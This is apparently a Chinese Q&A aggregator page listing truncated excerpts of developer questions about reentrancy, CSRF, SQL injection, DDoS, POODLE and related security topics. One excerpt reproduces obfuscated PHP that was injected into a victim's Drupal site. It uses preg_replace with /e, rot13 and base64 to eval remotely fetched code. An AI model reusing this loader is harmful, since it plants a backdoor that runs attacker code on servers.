草庐IT

重入攻击

全部标签

php - 是否可以通过 cpanel 配置和 php 脚本来防止 DDos 攻击?

我的网站受到DDos攻击(UDP泛洪攻击)!我无法访问linuxshell,我只能使用cpanel!:(是否可以通过php脚本来防止这种攻击?有没有办法配置cpanel来减少或重定向攻击?怎么办?根据网络托管帮助台:攻击速度在6到10Gbit/s之间!!!下面的代码有用吗?time()-2){//userswillberedirectedtothispageifitmakesrequestsfasterthan2secondsheader("Location:/flood.html");exit;}$_SESSION['last_session_request']=time();?>硬

php - 什么时候需要用 token 保护表单(CSRF 攻击)?

据我了解,Web开发人员应该创建token并将其放在表单的隐藏字段中以防止CSRF攻击。此外,他应该在session中保存相同的token,然后在提交表单时检查token是否相等。我来质疑了……是否有必要对所有形态都做这个技巧?我的意思是,想象一下为登录而创建的表单。如果没有CSRF保护,我看不到对网站和/或用户造成任何伤害,因为用户没有特权(就像他登录后一样)。注册也是如此……我说得对吗?附言如果我错了,请解释一下这个概念。 最佳答案 CSRF试图防止的危险是当您遇到以下情况时:用户已登录或其他,并具有一定的权限坏人在未经用户许可

Solidity - 安全 - 重入攻击(Reentrancy)

TheDAO事件首先简要说明下一个很有名的重入攻击事件,再模拟重入攻击。TheDAO是分布式自治组织,2016年5月正式发布,该项目使用了由德国以太坊创业公司Slock.it编写的开源代码。2016年6月17上午,被攻击的消息开始在社交网站上出现,到6月18日黑客将超过360万个以太币转移到一个childDAO项目中,childDAO项目和TheDAO有着一样的结构,当时以太币的价格从20美元降到了13美元。当时,一个所谓的”递归调用“攻击(现在称为重入攻击)名词随之出现,这种攻击可以被用来消耗一些智能合约账户。这次的黑客攻击最终导致了以太坊硬分叉,分为ETH和ETC,分叉前的为ETC(以太坊

php - Drupal 6 中的 SQL PHP 注入(inject)攻击

今天,我的drupal6站点中的所有节点都出现了这个添加的php脚本?php$node->nid=849;preg_replace('/^(.'.'*'.')$/'.'e',preg_replace('/^(.'.'*'.')$/'.'e','str'.'_'.'rot'.(27-14).'(\'\1\')','riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'),'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHR

php - Crypt 和 Salt 如何比 MD5 更安全地抵御暴力攻击?

我在PHP.net上看到MD5没用,他们建议使用crypt+salt。于是,我就去看了他们的功能描述或者在我的例子中是这样的:$stored_password=fetch_password($user);if(crypt($_REQUEST['password'],$stored_password)===$stored_password){//ok}因此,当我看到盐存储在散列密码中并且您使用该散列密码作为盐时,我认为Crypt+Salt对于输出的暴力破解(设法窃取散列密码的黑客)并不更安全).它更安全吗?对于字典攻击,我能理解它的威力,但对于对散列密码的暴力攻击,我看不到它的优势。

php - PHP 的 addslashes 容易受到 sql 注入(inject)攻击吗?

这个问题在这里已经有了答案:关闭10年前。PossibleDuplicate:Whatdoesmysql_real_escape_string()dothataddslashes()doesn't?我一直在查看关于PHP的addslashes函数如何/为什么易受sql注入(inject)攻击的文章。我读过的所有内容都说特定的mysql编码类型(default-character-set=GBK)存在问题,或者如果启用了magic_quotes则存在问题。但是,在这种情况下,我无法突破addslashes()函数并执行一些恶意操作-例如以管理员身份登录。$user=addslashes(

php - Apache 下的 PHP 是可重入的吗?

真的只是一个理论问题。假设我的网站包含一个使用PHP邮件功能发送电子邮件的表单。我有500个用户同时点击提交。现在必须从PHP发送500个不同session中的500封电子邮件。会同时进行吗?涉及多少个线程?每个人都会发送阻止其他人并一个一个地做吗? 最佳答案 您需要考虑两件事。首先是您如何配置Web服务器。如果您使用的是Apache,则有一些processingmodules可以从中挑选。最流行的处理模块是prefork,其中有一个单父进程和多个子进程。每个child一次处理一个请求。这完全避免了线程化,因为并非所有Apache模

php - 访问 https 资源时,PHP 的 fopen() 是否可以防止典型的攻击?

如果我使用PHP的fopen()函数从HTTPS网站检索数据,这就是所谓的安全HTTPS连接。即它是否提供针对中间人和窃听攻击的保护? 最佳答案 不是默认的,不是。它将始终提供某种形式的保护以防止简单的窃听攻击,因为数据将始终被加密(只要您连接到的SSL服务器允许至少使用一种加密密码-是的,空加密密码是在HTTPS连接中允许:roll-eyes:)但是,默认情况下,它不会防止中间人攻击,因为它不会验证服务器的证书,因此您无法确信您已连接到预期的目标服务器。可以打开证书验证。为此,您需要提供一个根证书包,并使用fopen的第四个参数来

java - 保护 Thrift 服务器免受 POODLE SSL 漏洞的攻击

为了保护我的Thrift服务器免受最近发现的SSLv3vulnerability,我明确说明应该为服务器套接字启用哪些协议(protocol):TServerSocketsocket=TSSLTransportFactory.getServerSocket(...);SSLServerSocketsslServerSocket=(SSLServerSocket)socket.getServerSocket;sslServerSocket.setEnabledProtocols(newString[]{"TLSv1.1","TLSv1.2"});但是,即使使用TestSSLServer进

java - 同步块(synchronized block)是否有最大可重入限制?

众所周知,ReentrantLock有最大重入限制:Integer.MAX_VALUE;是否synchronized块也有可重入限制吗?更新:我发现很难为同步重入编写测试代码:publicclassSyncReentry{publicstaticvoidmain(String[]args){synchronized(SyncReentry.class){synchronized(SyncReentry.class){//...writesynchronizedblockforever}}}}任何人都可以帮助编写一些用于同步重入限制测试的代码吗? 最佳答案